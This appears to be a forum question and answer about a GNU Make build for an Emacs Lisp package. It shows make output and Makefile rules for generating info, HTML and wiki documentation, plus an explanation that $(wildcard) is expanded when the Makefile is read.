info builds: i-iterate/info/i-iterate.texi
makeinfo --force -o i-iterate/docs/i-iterate.info i-iterate/info/i-iterate.texi
texi2html --split section --use-nodes i-iterate/info/i-iterate.texi
emacs -Q -L ./lisp -batch -f batch-byte-compile ./lisp/*.el
Wrote /home/wvxvw/Projects/i-iterate/trunk/lisp/i-iterate.elc
cp -r lisp info Makefile README i-pkg.el i-iterate
Third run
$ make
mkdir -p i-iterate
mkdir -p i-iterate/docs
mkdir -p i-iterate/html-docs
echo "info builds: i-iterate/info/i-iterate.texi"
info builds: i-iterate/info/i-iterate.texi
makeinfo --force -o i-iterate/docs/i-iterate.info i-iterate/info/i-iterate.texi
texi2html --split section --use-nodes i-iterate/info/i-iterate.texi
html2wiki --dialect GoogleCode i-iterate/html-docs/i-iterate_9.html > ../wiki/i-iterate_9.wiki
# ... a bunch more of the documentation pages ...
/i-iterate_5.wiki
html2wiki --dialect GoogleCode i-iterate/html-docs/i-iterate_2.html > ../wiki/i-iterate_2.wiki
emacs -Q -L ./lisp -batch -f batch-byte-compile ./lisp/*.el
Wrote /home/wvxvw/Projects/i-iterate/trunk/lisp/i-iterate.elc
cp -r lisp info Makefile README i-pkg.el i-iterate
As you can see, the $(INFO) isn't even entered on the first run, even though the directory where it outputs the file was just deleted and created anew. The exact same thing happens later when it (doesn't) rebuild the $(WIKI).
EDIT:
Here's the directory structure; text following # signs is commentary.
|- info
| +- documentation.texi
|- lisp
| +- source.el
| +- binary.elc # generated during compile
|- docs # should be deleted and created during the build
| +- documentation.info
|- html-docs # should be deleted and created during the build
| +- documentation.html
|- i-iterate # sources are copied here for distribution
| |- info
| | +- documentation.texi
| |- lisp
| | +- source.el
An update to the original Makefile, but the problem isn't solved
TEXI = $(wildcard $(DOCSRC)/*.texi)
INFO = $(addprefix $(DOCDST)/,$(notdir $(TEXI:.texi=.info)))
WIKIDST = ../wiki
$(DOCDST)/%.info: $(DOCSRC)/%.texi
@echo "info builds: $<"
$(IC) $(ICO) -o $@ $<
$(TEXI2HTML) $(TEXI2HTMLO) $<
# This rule is not applied! :(
$(WIKIDST)/%.wiki: $(HTMLDOCDST)/%.html
@echo "Wiki: $<"
$(HTML2WIKI) $(HTML2WIKIO) $< > $@
default: prepare $(INFO) move-html rename-wiki byte-compile
cp -r lisp info Makefile README i-pkg.el ${PACKAGE}
prepare:
mkdir -p ${PACKAGE}
mkdir -p ${DOCDST}
mkdir -p ${HTMLDOCDST}
move-html:
$(shell [[ '0' -ne `find ./ -maxdepth 1 -name "*.html" | wc -l` ]] && \
mv -f *.html ${HTMLDOCDST}/)
$(eval HTML := $(wildcard $(HTMLDOCDST)/*.html))
$(eval WIKI := $(addprefix $(WIKIDST)/,$(notdir $(HTML:.html=.wiki))))
@echo "HTML: $(HTML)" # prints as expected
@echo "WIKI: $(WIKI)" # prints as expected
rename-wiki: $(WIKI) # this dependency never triggers
# the $(WIKIDST)/%.wiki rule
@echo "Renaming: `ls $(HTMLDOCDST)`" # the files are there
$(shell cd ${WIKIDST} && rename 'i-iterate' 'Iterate' *.wiki)
$(shell find ${WIKIDST} -name "*.wiki" -exec sed -i \
's/\[i-iterate/\[Iterate/g;s/\.html\#/\#/g;s/</\</g;s/>/\>/g' \
'{}' \;)
Listing $(WIKI) as a prerequisite in this way doesn't trigger the corresponding rule for some reason.
And if I change rename-wiki to look something like:
rename-wiki: ../wiki/file.wiki
I get "no rule to make target", even though $(WIKIDST)/%.wiki is the rule to build that target.
EDIT2:
Finally, I could achieve what I want in doing it like so:
move-html:
$(shell [[ '0' -ne `find ./ -maxdepth 1 -name "*.html" | wc -l` ]] && \
mv -f *.html $(HTMLDOCDST)/)
$(foreach html, $(wildcard $(HTMLDOCDST)/*.html), \
$(HTML2WIKI) $(HTML2WIKIO) $(html) > \
$(addprefix $(WIKIDST)/, $(notdir $(html:.html=.wiki))))
Needless to mention how much I like this solution, and the language that makes one devise it.
There are several problems here. This may take a few iterations.
First: when you run make clean, you delete i-iterate/ and everything in it, including i-iterate/info/whatever.texi. Since there are no .texi files at that point, Make deduces that no .info files need to be made; $(INFO) is an empty list.
I gather that by some black magic the emacs command creates an info/ directory full of texi files out of the ether, which Make then copies into i-iterate/ (in the default rule). Is that correct? If it is correct, then we should do this before the $(INFO) step. I suspect that the same is true of the $(WIKI) step, but let's not get ahead of ourselves.
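The underlying trap is that $(wildcard ...) is expanded when the Makefile is read, before any recipe has run, so files a recipe creates are invisible to it on that same run. The same read-time-versus-run-time effect can be shown in plain shell (a loose analogy, not Make itself):

```shell
#!/bin/sh
# The glob is expanded when this line executes, just as $(wildcard)
# is expanded when Make reads the Makefile: files created later are unseen.
workdir=$(mktemp -d)
cd "$workdir"
snapshot=$(ls ./*.texi 2>/dev/null)   # taken before any .texi file exists
touch generated.texi                  # the "recipe" creates the file afterwards
echo "snapshot=[$snapshot]"           # → snapshot=[]
echo "now=[$(ls ./*.texi)]"           # → now=[./generated.texi]
```

This is why the build converges only over several make invocations: each run's wildcard sees the files produced by the previous run.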